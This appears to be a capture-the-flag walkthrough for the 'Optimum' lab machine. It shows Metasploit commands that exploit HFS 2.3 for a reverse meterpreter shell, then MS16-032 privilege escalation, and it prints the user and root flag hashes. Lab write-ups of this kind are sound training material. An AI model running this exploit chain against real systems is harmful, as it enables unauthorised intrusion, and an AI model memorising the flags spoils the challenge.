Optimum

As usual, let's start with nmap

nmap -sV -sC -p- 10.129.170.240

We can see it is using HFS 2.3. Let's google "HFS 2.3 exploit" and see if we find an exploit available.

We find an exploit on metasploit: https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/

Let's follow these steps in the article.

msfconsole

use exploit/windows/http/rejetto_hfs_exec

show options

set RHOSTS 10.129.170.240

set LHOST 10.10.14.21

exploit

getuid

sysinfo

shell

dir

We find a text file called user.txt.txt

Let's open using:

type user.txt.txt

d0c39409d7b994a9a1389ebf38ef5f73

Congratulations! You got the user flag!

Let's now look for the root flag

cd ..

cd ..

dir

cd Administrator

Access is denied

Return to the meterpreter shell by typing:

exit

Privilege Escalation

Let's use Lester (local exploit suggestor) from Metasploit. This will scan the target for vulnervabilities.

To run Lester, we use:

run post/multi/recon/local_exploit_suggester

There are a couple of exploits we could use but I tried exploit/windows/local/bypassuac_eventvwr and it didn't work.

We will use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

But first let's look at the processes running using

ps

Let's migrate to explorer.exe with PID 1988

migrate 1988

background

This is giving us the session id which is 1 (we will need that later)

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

show options

set SESSION 1

set LHOST 10.10.14.21

exploit

shell

cd C:\Users\Administrator\Desktop

dir

type root.txt

51ed1b36553c8461f4552c2e92b3eeed

Congratulations! You got the root flag!